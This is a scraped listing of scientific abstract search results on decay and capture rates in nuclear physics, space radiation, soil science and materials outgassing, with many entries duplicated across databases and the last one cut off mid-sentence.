40 Protection of Environment 34 2012-07-01 2012-07-01 false Vacuum-decay leak rate. 1065.644 Section 1065.644 Protection of Environment ENVIRONMENTAL PROTECTION AGENCY (CONTINUED) AIR POLLUTION CONTROLS ENGINE-TESTING PROCEDURES Calculations and Data Requirements § 1065.644 Vacuum-decay leak... 18. 40 CFR 1065.644 - Vacuum-decay leak rate. Code of Federal Regulations, 2014 CFR 2014-07-01 ... 40 Protection of Environment 33 2014-07-01 2014-07-01 false Vacuum-decay leak rate. 1065.644 Section 1065.644 Protection of Environment ENVIRONMENTAL PROTECTION AGENCY (CONTINUED) AIR POLLUTION CONTROLS ENGINE-TESTING PROCEDURES Calculations and Data Requirements § 1065.644 Vacuum-decay leak... 19. 40 CFR 1065.644 - Vacuum-decay leak rate. Code of Federal Regulations, 2013 CFR 2013-07-01 ... 40 Protection of Environment 34 2013-07-01 2013-07-01 false Vacuum-decay leak rate. 1065.644 Section 1065.644 Protection of Environment ENVIRONMENTAL PROTECTION AGENCY (CONTINUED) AIR POLLUTION CONTROLS ENGINE-TESTING PROCEDURES Calculations and Data Requirements § 1065.644 Vacuum-decay leak... 20. 40 CFR 1065.644 - Vacuum-decay leak rate. Code of Federal Regulations, 2011 CFR 2011-07-01 ... 40 Protection of Environment 33 2011-07-01 2011-07-01 false Vacuum-decay leak rate. 1065.644 Section 1065.644 Protection of Environment ENVIRONMENTAL PROTECTION AGENCY (CONTINUED) AIR POLLUTION CONTROLS ENGINE-TESTING PROCEDURES Calculations and Data Requirements § 1065.644 Vacuum-decay leak... 1. 40 CFR 1065.644 - Vacuum-decay leak rate. Code of Federal Regulations, 2010 CFR 2010-07-01 ... 40 Protection of Environment 32 2010-07-01 2010-07-01 false Vacuum-decay leak rate. 1065.644 Section 1065.644 Protection of Environment ENVIRONMENTAL PROTECTION AGENCY (CONTINUED) AIR POLLUTION CONTROLS ENGINE-TESTING PROCEDURES Calculations and Data Requirements § 1065.644 Vacuum-decay leak... 2. Decay rates of the magnetohydrodynamic model for quantum plasmas Pu, Xueke; Xu, Xiuli 2017-02-01 In this paper, we consider the quantum magnetohydrodynamic model for quantum plasmas. We prove the optimal decay rates for the solution to the constant state in the whole space in the Lp-norm with 2≤ p≤ 6 and its first derivatives in L2-norm. The proof is based on the optimal decay of the linearized equation and nonlinear energy estimates. 3. Sensitivity studies for the main r process: β-decay rates SciTech Connect Mumpower, M.; Cass, J.; Passucci, G.; Aprahamian, A.; Surman, R. 2014-04-15 The pattern of isotopic abundances produced in rapid neutron capture, or r-process, nucleosynthesis is sensitive to the nuclear physics properties of thousands of unstable neutron-rich nuclear species that participate in the process. It has long been recognized that the some of the most influential pieces of nuclear data for r-process simulations are β-decay lifetimes. In light of experimental advances that have pushed measurement capabilities closer to the classic r-process path, we revisit the role of individual β-decay rates in the r process. We perform β-decay rate sensitivity studies for a main (A > 120) r process in a range of potential astrophysical scenarios. We study the influence of individual rates during (n, γ)-(γ, n) equilibrium and during the post-equilibrium phase where material moves back toward stability. We confirm the widely accepted view that the most important lifetimes are those of nuclei along the r-process path for each astrophysical scenario considered. However, we find in addition that individual β-decay rates continue to shape the final abundance pattern through the post-equilibrium phase, for as long as neutron capture competes with β decay. Many of the lifetimes important for this phase of the r process are within current or near future experimental reach. 4. Modern Measurements of Uranium Decay Rates Parsons-Moss, T.; Faye, S. A.; Williams, R. W.; Wang, T. F.; Renne, P. R.; Mundil, R.; Harrison, M.; Bandong, B. B.; Moody, K.; Knight, K. B. 2015-12-01 It has been widely recognized that accurate and precise decay constants (λ) are critical to geochronology as highlighted by the EARTHTIME initiative, particularly the calibration benchmarks λ235U and λ238U. [1] Alpha counting experiments in 1971[2] measured λ235U and λ238U with ~0.1% precision, but have never been independently validated. We are embarking on new direct measurements of λ235U, λ238U, λ234Th, and λ234U using independent approaches for each nuclide. For the measurement of λ235U, highly enriched 235U samples will be chemically purified and analyzed for U concentration and isotopic composition by multi-collector inductively coupled plasma mass spectrometry (MC-ICP-MS). Thin films will be electrodeposited from these solutions and the α activity will be measured in an α-γ coincidence counting apparatus, which allows reduced uncertainty in counting efficiency while achieving adequate counting statistics. For λ238U measurement we will measure ingrowth of 234Th in chemically purified, isotopically enriched 238U solutions, by quantitatively separating the Th and allowing complete decay to 234U. All of the measurements will be done using MC-ICP-MS aiming at 0.05% precision. This approach is expected to result in values of λ238U with less than 0.1% uncertainty, if combined with improved λ234Th measements. These will be achieved using direct decay measurements with an E-∆E charged particle telescope in coincidence with a gamma detector. This system allows measurement of 234Th β-decay and simultaneous detection and identification of α particles emitted by the 234U daughter, thus observing λ234U at the same time. The high-precision λ234U obtained by the direct activity measurements can independently verify the commonly used values obtained by indirect methods.[3] An overarching goal of the project is to ensure the quality of results including metrological traceability in order to facilitate implementation across diverse disciplines. [1] T 5. Double K-shell vacancy production in the electron capture decay of 125I Hindi, M. M.; Kozub, R. L. 1992-03-01 We have measured the probability of double K-shell vacancy production in the electron capture decay of 125I to the 35-keV level of 125Te. The probability was deduced from the number of triple coincidences between the Te hypersatellite and satellite x rays produced in filling the double vacancy, and the subsequent normal x ray accompanying the K internal conversion of the 35-keV level. The probability of double K-shell vacancy production per K-shell electron capture (PKK) was found to be (1.35+/-0.15)×10-5. 6. Double K-shell ionization in the electron capture decay of 55Fe Campbell, J. L.; Maxwell, J. A.; Teesdale, W. J. 1991-04-01 The probability per K capture for double K-shell ionization in the electron capture decay of 55Fe was obtained by fitting a model spectrum to the x-ray spectrum recorded to very high statistics in a high-resolution Si(Li) detector. The result, PKK=(1.3+/-0.2)×10-4, confirms the trend wherein experimental data decrease smoothly with Z, and are intermediate between the theoretical predictions of Intemann and of Suzuki and Law. Corrections to some recently published PKK values reconcile them with this trend. 7. A comparison of radiative capture with decay gamma-ray method in bore hole logging for economic minerals USGS Publications Warehouse Senftle, F.E.; Moxham, R.M.; Tanner, A.B. 1972-01-01 The recent availability of borehole logging sondes employing a source of neutrons and a Ge(Li) detector opens up the possibility of analyzing either decay or capture gamma rays. The most efficient method for a given element can be predicted by calculating the decay-to-capture count ratio for the most prominent peaks in the respective spectra. From a practical point of view such a calculation must be slanted toward short irradiation and count times at each station in a borehole. A simplified method of computation is shown, and the decay-to-capture count ratio has been calculated and tabulated for the optimum value in the decay mode irrespective of the irradiation time, and also for a ten minute irradiation time. Based on analysis of a single peak in each spectrum, the results indicate the preferred technique and the best decay or capture peak to observe for those elements of economic interest. ?? 1972. 8. Inverse method for estimating respiration rates from decay time series Forney, D. C.; Rothman, D. H. 2012-09-01 Long-term organic matter decomposition experiments typically measure the mass lost from decaying organic matter as a function of time. These experiments can provide information about the dynamics of carbon dioxide input to the atmosphere and controls on natural respiration processes. Decay slows down with time, suggesting that organic matter is composed of components (pools) with varied lability. Yet it is unclear how the appropriate rates, sizes, and number of pools vary with organic matter type, climate, and ecosystem. To better understand these relations, it is necessary to properly extract the decay rates from decomposition data. Here we present a regularized inverse method to identify an optimally-fitting distribution of decay rates associated with a decay time series. We motivate our study by first evaluating a standard, direct inversion of the data. The direct inversion identifies a discrete distribution of decay rates, where mass is concentrated in just a small number of discrete pools. It is consistent with identifying the best fitting "multi-pool" model, without prior assumption of the number of pools. However we find these multi-pool solutions are not robust to noise and are over-parametrized. We therefore introduce a method of regularized inversion, which identifies the solution which best fits the data but not the noise. This method shows that the data are described by a continuous distribution of rates, which we find is well approximated by a lognormal distribution, and consistent with the idea that decomposition results from a continuum of processes at different rates. The ubiquity of the lognormal distribution suggest that decay may be simply described by just two parameters: a mean and a variance of log rates. We conclude by describing a procedure that estimates these two lognormal parameters from decay data. Matlab codes for all numerical methods and procedures are provided. 9. Inverse method for estimating respiration rates from decay time series Forney, D. C.; Rothman, D. H. 2012-03-01 Long-term organic matter decomposition experiments typically measure the mass lost from decaying organic matter as a function of time. These experiments can provide information about the dynamics of carbon dioxide input to the atmosphere and controls on natural respiration processes. Decay slows down with time, suggesting that organic matter is composed of components (pools) with varied lability. Yet it is unclear how the appropriate rates, sizes, and number of pools vary with organic matter type, climate, and ecosystem. To better understand these relations, it is necessary to properly extract the decay rates from decomposition data. Here we present a regularized inverse method to identify an optimally-fitting distribution of decay rates associated with a decay time series. We motivate our study by first evaluating a standard, direct inversion of the data. The direct inversion identifies a discrete distribution of decay rates, where mass is concentrated in just a small number of discrete pools. It is consistent with identifying the best fitting "multi-pool" model, without prior assumption of the number of pools. However we find these multi-pool solutions are not robust to noise and are over-parametrized. We therefore introduce a method of regularized inversion, which identifies the solution which best fits the data but not the noise. This method shows that the data are described by a continuous distribution of rates which we find is well approximated by a lognormal distribution, and consistent with the idea that decomposition results from a continuum of processes at different rates. The ubiquity of the lognormal distribution suggest that decay may be simply described by just two parameters; a mean and a variance of log rates. We conclude by describing a procedure that estimates these two lognormal parameters from decay data. Matlab codes for all numerical methods and procedures are provided. 10. Double K-shell vacancy production in the electron capture decay of 139Ce Hindi, M. M.; Kozub, R. L. 1991-02-01 The probability of double K-shell vacancy production in the electron capture decay of 139Ce to the 166-keV level of 139La has been investigated. Triple coincidences between the 166-keV gamma ray, the La satellite Kα x ray, and the La hypersatellite Kα x ray were measured using two intrinsic Ge detectors. We looked for the sum of two of the three radiations in one detector in coincidence with the third radiation in the other detector. The probability of double K-shell vacancy production per K-shell electron capture (PKK) was found to be (2.0+/-1.6)×10-6. From this and the known PKK for 131Cs we estimate a probability for zero K-shell vacancy production (shakedown) per K-shell electron capture of <~2.4×10-5 for 139Ce. 11. Decay rate of the second radiation belt NASA Technical Reports Server (NTRS) Badhwar, G. D.; Robbins, D. E. 1996-01-01 Variations in the Earth's trapped (Van Allen) belts produced by solar flare particle events are not well understood. Few observations of increases in particle populations have been reported. This is particularly true for effects in low Earth orbit, where manned spaceflights are conducted. This paper reports the existence of a second proton belt and it's subsequent decay as measured by a tissue-equivalent proportional counter and a particle spectrometer on five Space Shuttle flights covering an eighteen-month period. The creation of this second belt is attributed to the injection of particles from a solar particle event which occurred at 2246 UT, March 22, 1991. Comparisons with observations onboard the Russian Mir space station and other unmanned satellites are made. Shuttle measurements and data from other spacecraft are used to determine that the e-folding time of the peak of the second proton belt. It was ten months. Proton populations in the second belt returned to values of quiescent times within eighteen months. The increase in absorbed dose attributed to protons in the second belt was approximately 20%. Passive dosimeter measurements were in good agreement with this value. 12. Decay rate of the second radiation belt NASA Technical Reports Server (NTRS) Badhwar, G. D.; Robbins, D. E. 1996-01-01 Variations in the Earth's trapped (Van Allen) belts produced by solar flare particle events are not well understood. Few observations of increases in particle populations have been reported. This is particularly true for effects in low Earth orbit, where manned spaceflights are conducted. This paper reports the existence of a second proton belt and it's subsequent decay as measured by a tissue-equivalent proportional counter and a particle spectrometer on five Space Shuttle flights covering an eighteen-month period. The creation of this second belt is attributed to the injection of particles from a solar particle event which occurred at 2246 UT, March 22, 1991. Comparisons with observations onboard the Russian Mir space station and other unmanned satellites are made. Shuttle measurements and data from other spacecraft are used to determine that the e-folding time of the peak of the second proton belt. It was ten months. Proton populations in the second belt returned to values of quiescent times within eighteen months. The increase in absorbed dose attributed to protons in the second belt was approximately 20%. Passive dosimeter measurements were in good agreement with this value. 13. Decay rate of the second radiation belt. PubMed Badhwar, G D; Robbins, D E 1996-01-01 Variations in the Earth's trapped (Van Allen) belts produced by solar flare particle events are not well understood. Few observations of increases in particle populations have been reported. This is particularly true for effects in low Earth orbit, where manned spaceflights are conducted. This paper reports the existence of a second proton belt and it's subsequent decay as measured by a tissue-equivalent proportional counter and a particle spectrometer on five Space Shuttle flights covering an eighteen-month period. The creation of this second belt is attributed to the injection of particles from a solar particle event which occurred at 2246 UT, March 22, 1991. Comparisons with observations onboard the Russian Mir space station and other unmanned satellites are made. Shuttle measurements and data from other spacecraft are used to determine that the e-folding time of the peak of the second proton belt. It was ten months. Proton populations in the second belt returned to values of quiescent times within eighteen months. The increase in absorbed dose attributed to protons in the second belt was approximately 20%. Passive dosimeter measurements were in good agreement with this value. 14. Experimental Neutron Capture Rate Constraint Far from Stability Liddick, S. N.; Spyrou, A.; Crider, B. P.; Naqvi, F.; Larsen, A. C.; Guttormsen, M.; Mumpower, M.; Surman, R.; Perdikakis, G.; Bleuel, D. L.; Couture, A.; Crespo Campo, L.; Dombos, A. C.; Lewis, R.; Mosby, S.; Nikas, S.; Prokop, C. J.; Renstrom, T.; Rubio, B.; Siem, S.; Quinn, S. J. 2016-06-01 Nuclear reactions where an exotic nucleus captures a neutron are critical for a wide variety of applications, from energy production and national security, to astrophysical processes, and nucleosynthesis. Neutron capture rates are well constrained near stable isotopes where experimental data are available; however, moving far from the valley of stability, uncertainties grow by orders of magnitude. This is due to the complete lack of experimental constraints, as the direct measurement of a neutron-capture reaction on a short-lived nucleus is extremely challenging. Here, we report on the first experimental extraction of a neutron capture reaction rate on 69Ni, a nucleus that is five neutrons away from the last stable isotope of Ni. The implications of this measurement on nucleosynthesis around mass 70 are discussed, and the impact of similar future measurements on the understanding of the origin of the heavy elements in the cosmos is presented. 15. Experimental Neutron Capture Rate Constraint Far from Stability. PubMed Liddick, S N; Spyrou, A; Crider, B P; Naqvi, F; Larsen, A C; Guttormsen, M; Mumpower, M; Surman, R; Perdikakis, G; Bleuel, D L; Couture, A; Crespo Campo, L; Dombos, A C; Lewis, R; Mosby, S; Nikas, S; Prokop, C J; Renstrom, T; Rubio, B; Siem, S; Quinn, S J 2016-06-17 Nuclear reactions where an exotic nucleus captures a neutron are critical for a wide variety of applications, from energy production and national security, to astrophysical processes, and nucleosynthesis. Neutron capture rates are well constrained near stable isotopes where experimental data are available; however, moving far from the valley of stability, uncertainties grow by orders of magnitude. This is due to the complete lack of experimental constraints, as the direct measurement of a neutron-capture reaction on a short-lived nucleus is extremely challenging. Here, we report on the first experimental extraction of a neutron capture reaction rate on ^{69}Ni, a nucleus that is five neutrons away from the last stable isotope of Ni. The implications of this measurement on nucleosynthesis around mass 70 are discussed, and the impact of similar future measurements on the understanding of the origin of the heavy elements in the cosmos is presented. 16. Effects of vacuum fluctuation suppression on atomic decay rates SciTech Connect Ford, L.H.; Roman, Thomas A. 2011-08-15 Highlights: > Excited atoms are shot through a cavity containing an electromagnetic field. > Cavity is in the lowest mode in a non-classical state. > Such a state can suppress the decay rate of the atoms in certain situations. > We show that this effect can be correlated with periods of negative energy density. - Abstract: The use of atomic decay rates as a probe of sub-vacuum phenomena will be studied. Because electromagnetic vacuum fluctuations are essential for radiative decay of excited atomic states, decay rates can serve as a measure of the suppression of vacuum fluctuations in non-classical states, such as squeezed vacua. In such states, the renormalized expectation value of the square of the electric field or the energy density can be periodically negative, representing suppression of vacuum fluctuations. We explore the extent to which atomic decays can be used to measure the mean squared electric field or energy density. We consider a scheme in which atoms in an excited state transit a closed cavity whose lowest mode contains photons in a non-classical state. A crucial feature of our analysis is that we do not employ the rotating wave approximation. The change in the decay probability of the atom in the cavity due to the non-classical state can, under certain circumstances, serve as a measure of the mean squared electric field or energy density in the cavity. We make some estimates of the magnitude of this effect, which indicate that an experimental test might be possible, although very challenging. 17. Detailed description of exclusive muon capture rates using realistic two-body forces Giannaka, P. G.; Kosmas, T. S. 2015-07-01 Starting from state-by-state calculations of exclusive rates of the ordinary muon capture, we evaluated total μ- capture rates for a set of light- and medium-weight nuclear isotopes. We employed a version of the proton-neutron quasiparticle random-phase approximation (p n -QRPA, for short) which uses as realistic nuclear forces the Bonn C-D one-boson exchange potential. Special attention was paid on the percentage contribution to the total μ- capture rate of specific low-spin multipolarities resulting by summing over the corresponding multipole transitions. The nuclear method used offers the possibility of estimating separately the individual contributions to the total and partial rates of the polar-vector and axial-vector components of the weak-interaction Hamiltonian for each accessible final state of the daughter nucleus. One of our main goals is to provide a reliable description of the charge-changing transitions matrix elements entering the description of other similar semileptonic nuclear processes like the charged-current neutrino-nucleus reactions, the electron capture on nuclei, the single β±-decay mode, etc., which play important role in currently interesting laboratory and astrophysical applications like the neutrino detection through lepton-nucleus interaction probes and neutrino nucleosynthesis. Such results can also be useful in various ongoing muon capture experiments at Paul Scherrer Institute (PSI), Fermilab, Japan Proton Accelerator Research Complex, and Research Center for Nuclear Physics, Osaka University. 18. Uncertainties in the calculation of solar-neutrino capture rates SciTech Connect Filippone, B.W. 1981-01-01 A detailed estimate is presented of the possible uncertainty range for the neutrino flux from a standard solar model. Using present estimated errors in the key input parameters, detailed solar models are calculated to give an uncertainty in the theoretical nu/sub e/ capture rate in both the on-going /sup 37/Cl experiment and the proposed experiment using /sup 71/Ga. The uncertainty in capture rate is investigated by considering individual parameter variations about a mean model, by simultaneously varying several key parameters to yield upper and lower limits, and by a Monte Carlo method. 19. A New Decay Path in the {sup 12}C+{sup 16}O Radiative Capture Reaction SciTech Connect Courtin, S.; Lebhertz, D.; Haas, F.; Beck, C.; Michalon, A.; Salsac, M.-D.; Jenkins, D. G.; Marley, P.; Lister, C. J. 2009-03-04 The {sup 12}C({sup 16}O,{gamma}){sup 28}Si radiative capture reaction has been studied at energies close to the Coulomb barrier at Triumf (Vancouver) using the Dragon spectrometer and its associated BGO array. It has been observed that the {gamma} decay flux proceeds mainly via states around 10-11 MeV and via the direct feeding of the {sup 28}Si 3{sub 1}{sup -}(6879 keV) and 4{sub 2}{sup +}(6888 keV) deformed states. A discussion is presented about this selective feeding as well as perspectives for the use of novel detection systems for the study of light heavy-ion radiative capture reactions. 20. Double K -shell vacancy production in the electron capture decay of sup 125 I SciTech Connect Hindi, M.M.; Kozub, R.L. ) 1992-03-01 We have measured the probability of double {ital K}-shell vacancy production in the electron capture decay of {sup 125}I to the 35-keV level of {sup 125}Te. The probability was deduced from the number of triple coincidences between the Te hypersatellite and satellite x rays produced in filling the double vacancy, and the subsequent normal x ray accompanying the {ital K} internal conversion of the 35-keV level. The probability of double {ital K}-shell vacancy production per {ital K}-shell electron capture ({ital P}{sub {ital K}{ital K}}) was found to be (1.35{plus minus}0.15){times}10{sup {minus}5}. 1. Glueball decay rates in the Witten-Sakai-Sugimoto model Brünner, Frederic; Parganlija, Denis; Rebhan, Anton 2015-05-01 We revisit and extend previous calculations of glueball decay rates in the Sakai-Sugimoto model, a holographic top-down approach for QCD with chiral quarks based on D 8 -D 8 ¯ probe branes in Witten's holographic model of nonsupersymmetric Yang-Mills theory. The rates for decays into two pions, two vector mesons, four pions, and the strongly suppressed decay into four π0 are worked out quantitatively, using a range of the 't Hooft coupling which closely reproduces the decay rate of ρ and ω mesons and also leads to a gluon condensate consistent with QCD sum rule calculations. The lowest holographic glueball, which arises from a rather exotic polarization of gravitons in the supergravity background, turns out to have a significantly lower mass and larger width than the two widely discussed glueball candidates f0(1500 ) and f0(1710 ) . The lowest nonexotic and predominantly dilatonic scalar mode, which has a mass of 1487 MeV in the Witten-Sakai-Sugimoto model, instead provides a narrow glueball state, and we conjecture that only this nonexotic mode should be identified with a scalar glueball component of f0(1500 ) or f0(1710 ). Moreover the decay pattern of the tensor glueball is determined, which is found to have a comparatively broad total width when its mass is adjusted to around or above 2 GeV. 2. Observations of HF backscatter decay rates from HAARP generated FAI Bristow, William; Hysell, David 2016-07-01 Suitable experiments at the High-frequency Active Auroral Research Program (HAARP) facilities in Gakona, Alaska, create a region of ionospheric Field-Aligned Irregularities (FAI) that produces strong radar backscatter observed by the SuperDARN radar on Kodiak Island, Alaska. Creation of FAI in HF ionospheric modification experiments has been studied by a number of authors who have developed a rich theoretical background. The decay of the irregularities, however, has not been so widely studied yet it has the potential for providing estimates of the parameters of natural irregularity diffusion, which are difficult measure by other means. Hysell, et al. [1996] demonstrated using the decay of radar scatter above the Sura heating facility to estimate irregularity diffusion. A large database of radar backscatter from HAARP generated FAI has been collected over the years. Experiments often cycled the heater power on and off in a way that allowed estimates of the FAI decay rate. The database has been examined to extract decay time estimates and diffusion rates over a range of ionospheric conditions. This presentation will summarize the database and the estimated diffusion rates, and will discuss the potential for targeted experiments for aeronomy measurements. Hysell, D. L., M. C. Kelley, Y. M. Yampolski, V. S. Beley, A. V. Koloskov, P. V. Ponomarenko, and O. F. Tyrnov, HF radar observations of decaying artificial field aligned irregularities, J. Geophys. Res. , 101, 26,981, 1996. 3. Observations of HF backscatter decay rates from HAARP generated FAI Bristow, W. A.; Hysell, D. L. 2016-12-01 Suitable experiments at the High-frequency Active Auroral Research Program (HAARP) facilities in Gakona, Alaska, create a region of ionospheric Field-Aligned Irregularities (FAI) that produces strong radar backscatter observed by the SuperDARN radar on Kodiak Island, Alaska. Creation of FAI in HF ionospheric modification experiments has been studied by a number of authors who have developed a rich theoretical background. The decay of the irregularities, however, has not been so widely studied yet it has the potential for providing estimates of the parameters of natural irregularity diffusion, which are difficult measure by other means. Hysell, et al. [1996] demonstrated using the decay of radar scatter above the Sura heating facility to estimate irregularity diffusion. A large database of radar backscatter from HAARP generated FAI has been collected over the years. Experiments often cycled the heater power on and off in a way that allowed estimates of the FAI decay rate. The database has been examined to extract decay time estimates and diffusion rates over a range of ionospheric conditions. This presentation will summarize the database and the estimated diffusion rates, and will discuss the potential for targeted experiments for aeronomy measurements. Hysell, D. L., M. C. Kelley, Y. M. Yampolski, V. S. Beley, A. V. Koloskov, P. V. Ponomarenko, and O. F. Tyrnov, HF radar observations of decaying artificial field aligned irregularities, J. Geophys. Res. , 101, 26,981, 1996. 4. Time decay rates of non-Newtonian flows in RN+ Dong, Bo-Qing; Chen, Zhi-Min 2006-12-01 This paper is concerned with time decay rates of the weak solutions of an incompressible non-Newtonian fluid motion model in half spaces for n[greater-or-equal, slanted]3. With the use of the spectral decomposition of the Stokes operator and Lp-Lq estimates, it is shown that the weak solutions decay in L2 norm like when the initial velocity u0[set membership, variant]L2[intersection]Lr for 1[less-than-or-equals, slant]r<2. The higher decay rates are obtained, if u0 satisfies the additional moment condition Moreover, the error estimates between the non-Newtonian flow and the Navier-Stokes flow are discussed. 5. Radiative decay rates of impurity states in semiconductor nanocrystals Turkov, Vadim K.; Baranov, Alexander V.; Fedorov, Anatoly V.; Rukhlenko, Ivan D. 2015-10-01 Doped semiconductor nanocrystals is a versatile material base for contemporary photonics and optoelectronics devices. Here, for the first time to the best of our knowledge, we theoretically calculate the radiative decay rates of the lowest-energy states of donor impurity in spherical nanocrystals made of four widely used semiconductors: ZnS, CdSe, Ge, and GaAs. The decay rates were shown to vary significantly with the nanocrystal radius, increasing by almost three orders of magnitude when the radius is reduced from 15 to 5 nm. Our results suggest that spontaneous emission may dominate the decay of impurity states at low temperatures, and should be taken into account in the design of advanced materials and devices based on doped semiconductor nanocrystals. 6. Radiative decay rates of impurity states in semiconductor nanocrystals SciTech Connect Turkov, Vadim K.; Baranov, Alexander V.; Fedorov, Anatoly V.; Rukhlenko, Ivan D. 2015-10-15 Doped semiconductor nanocrystals is a versatile material base for contemporary photonics and optoelectronics devices. Here, for the first time to the best of our knowledge, we theoretically calculate the radiative decay rates of the lowest-energy states of donor impurity in spherical nanocrystals made of four widely used semiconductors: ZnS, CdSe, Ge, and GaAs. The decay rates were shown to vary significantly with the nanocrystal radius, increasing by almost three orders of magnitude when the radius is reduced from 15 to 5 nm. Our results suggest that spontaneous emission may dominate the decay of impurity states at low temperatures, and should be taken into account in the design of advanced materials and devices based on doped semiconductor nanocrystals. 7. Decay strength distributions in {sup 12}C({sup 12}C,{gamma}) radiative capture SciTech Connect Jenkins, D. G.; Fulton, B. R.; Marley, P.; Fox, S. P.; Glover, R.; Wadsworth, R.; Watson, D. L.; Courtin, S.; Haas, F.; Lebhertz, D.; Beck, C.; Papka, P.; Rousseau, M.; Sanchez i Zafra, A.; Hutcheon, D. A.; Davis, C.; Ottewell, D.; Pavan, M. M.; Pearson, J.; Ruiz, C. 2007-10-15 The heavy-ion radiative capture reaction, {sup 12}C({sup 12}C,{gamma}), has been investigated at energies both on- and off-resonance, with a particular focus on known resonances at E{sub c.m.}=6.0, 6.8, 7.5, and 8.0 MeV. Gamma rays detected in a BGO scintillator array were recorded in coincidence with {sup 24}Mg residues at the focal plane of the DRAGON recoil separator at TRIUMF. In this manner, the relative strength of all decay pathways through excited states up to the particle threshold could be examined for the first time. Isovector M1 transitions are found to be a important component of the radiative capture from the E{sub c.m.}=6.0 and 6.8 MeV resonances. Comparison with Monte Carlo simulations suggests that these resonances may have either J=0 or 2, with a preference for J=2. The higher energy resonances at E{sub c.m.}=7.5 and 8.0 MeV have a rather different decay pattern. The former is a clear candidate for a J=4 resonance, whereas the latter has a dominant J=4 character superposed on a J=2 resonant component underneath. The relationship between these resonances and the well-known quasimolecular resonances as well as resonances in breakup and electrofission of {sup 24}Mg into two {sup 12}C nuclei are discussed. 8. Capturing relic neutrinos with {beta}- and double {beta}-decaying nuclei SciTech Connect Hodak, Rastislav; Kovalenko, Sergey; Simkovic, Fedor 2009-11-09 Neutrinos are probably one of the most important structural constituents of the Universe. The Big Bang Theory predicts that the significant component of them is formed by the cosmic neutrino background, an analogues of the big bang relic photons comprising the cosmic microwave background radiation, which has been measured with amazing accuracy. Properties of the relic neutrino background are closely related to the ones of the cosmic microwave radiation. Relic neutrinos pervade space, but their temperature is extremely small, being of the order of 0.1 meV. Although belonging to the most abundant particles of the Universe, the relic neutrinos evade direct detection so far. This is because the low-energy neutrinos interact only very weakly with matter. In this contribution, we explore the feasibility to detect the cosmic neutrino background by means of {beta}-decaying ({sup 3}H and {sup 187}Re) and double beta decaying ({sup 100}Mo) nuclei. In addition, we address the question whether double relic neutrino capture on nuclei can be an obstacle for observation of neutrinoless double {beta}-decay. 9. Litter decay rates are determined by lignin chemistry Treesearch Jennifer M. Talbot; Daniel J. Yelle; James Nowick; Kathleen K. Treseder 2011-01-01 Litter decay rates are often correlated with the initial lignin:N or lignin:cellulose content of litter, suggesting that interactions between lignin and more labile compounds are important controls over litter decomposition. The chemical composition of lignin may influence these interactions, if lignin physically or chemically protects labile components from microbial... 10. Influences of the astrophysical environment on nuclear decay rates SciTech Connect Norman, E.B. 1987-09-01 In many astronomical environments, physical conditions are so extreme that nuclear decay rates can be significantly altered from their laboratory values. Such effects are relevant to a number of current problems in nuclear astrophysics. Experiments related to these problems are now being pursued, and will be described in this talk. 19 refs., 5 figs. 11. Beta-decay rates: towards a self-consistent approach SciTech Connect Borzov, I. N.; Goriely, S.; Pearson, J. M. 1998-02-15 An approximation to a self-consistent model of the ground state properties and spin-isospin excitations of neutron-rich nuclides is outlined. The structure of the Gamow-Teller strength functions in stable nuclei and short-lived nuclides undergoing high-energy {beta}-decay is discussed. The results of large-scale calculations of the {beta}-decay rates for spherical and slightly deformed nuclides of relevance to the r-process are analysed and compared with the results of existing global calculations. 12. Uncertainties in Astrophysical β-decay Rates from the FRDM SciTech Connect Bertolli, M.G.; Möller, P.; Jones, S. 2014-06-15 β{sup −}-decay rates are of crucial importance in stellar evolution and nucleosynthesis, as they are a key component in stellar processes. Tabulated values of the decay rates as functions of both temperature T and density ρ are necessary input to stellar evolution codes such as MESA, or largescale nucleosynthesis simulations such as those performed by the NuGrid collaboration. Therefore, it is interesting to know the uncertainties in these rates and the effects of these uncertainties on stellar structure and isotopic yields. We have calculated β-strength functions and reaction rates for nuclei ranging from {sup 16}O to {sup 339}136, extending from the proton drip line to the neutron drip line based on a quasi-particle random-phase approximation (QRPA) in a deformed folded-Yukawa single-particle model. Q values are determined from the finite-range droplet mass model (FRDM). We have investigated the effect of model uncertainty on astrophysical β{sup −}-decay rates calculated by the FRDM. The sources of uncertainty considered are Q values and deformation. The rates and their uncertainties are generated for a variety of temperature and density ranges, corresponding to key stellar processes. We demonstrate the effects of these rate uncertainties on isotopic abundances using the NuGrid network calculations. 13. Double K -shell vacancy production in the electron capture decay of sup 139 Ce SciTech Connect Hindi, M.M.; Kozub, R.L. ) 1991-02-01 The probability of double {ital K}-shell vacancy production in the electron capture decay of {sup 139}Ce to the 166-keV level of {sup 139}La has been investigated. Triple coincidences between the 166-keV gamma ray, the La satellite {ital K}{alpha} x ray, and the La hypersatellite {ital K}{alpha} x ray were measured using two intrinsic Ge detectors. We looked for the sum of two of the three radiations in one detector in coincidence with the third radiation in the other detector. The probability of double {ital K}-shell vacancy production per {ital K}-shell electron capture ({ital P}{sub {ital K}{ital K}}) was found to be (2.0{plus minus}1.6){times}10{sup {minus}6}. From this and the known {ital P}{sub {ital K}{ital K}} for {sup 131}Cs we estimate a probability for zero {ital K}-shell vacancy production (shakedown) per {ital K}-shell electron capture of {approx lt}2.4{times}10{sup {minus}5} for {sup 139}Ce. 14. Materials Outgassing Rate Decay in Vacuum at Isothermal Conditions NASA Technical Reports Server (NTRS) Huang, Alvin Y.; Kastanas, George N.; Kramer, Leonard; Soares, Carlos E.; Mikatarian, Ronald R. 2016-01-01 As a laboratory for scientific research, the International Space Station has been in Low Earth Orbit for nearly 20 years and is expected to be on-orbit for another 10 years. The ISS has been maintaining a relatively pristine contamination environment for science payloads. Materials outgassing induced contamination is currently the dominant source for sensitive surfaces on ISS and modeling the outgassing rate decay over a 20 to 30 year period is challenging. Materials outgassing is described herein as a diffusion-reaction process using ASTM E 1559 rate data. The observation of -1/2 (diffusion) or non-integers (reaction limited) as rate decay exponents for common ISS materials indicate classical reaction kinetics is unsatisfactory in modeling materials outgassing. Non-randomness of reactant concentrations at the interface is the source of this deviation from classical reaction kinetics. A diffusion limited decay was adopted as the result of the correlation of the contaminant layer thicknesses on returned ISS hardware, the existence of high outgassing silicone exhibiting near diffusion limited decay, and the confirmation of non-depleted material after ten years in the Low Earth Orbit.Keywords: Materials Outgassing, ASTM E 1559, Reaction Kinetics, Diffusion, Space Environments Effects, Contamination 15. Materials outgassing rate decay in vacuum at isothermal conditions Huang, Alvin Y.; Kastanas, George N.; Kramer, Leonard; Soares, Carlos E.; Mikatarian, Ronald R. 2016-09-01 As a laboratory for scientific research, the International Space Station has been in Low Earth Orbit for over 17 years and is planned to be on-orbit for another 10 years. The ISS 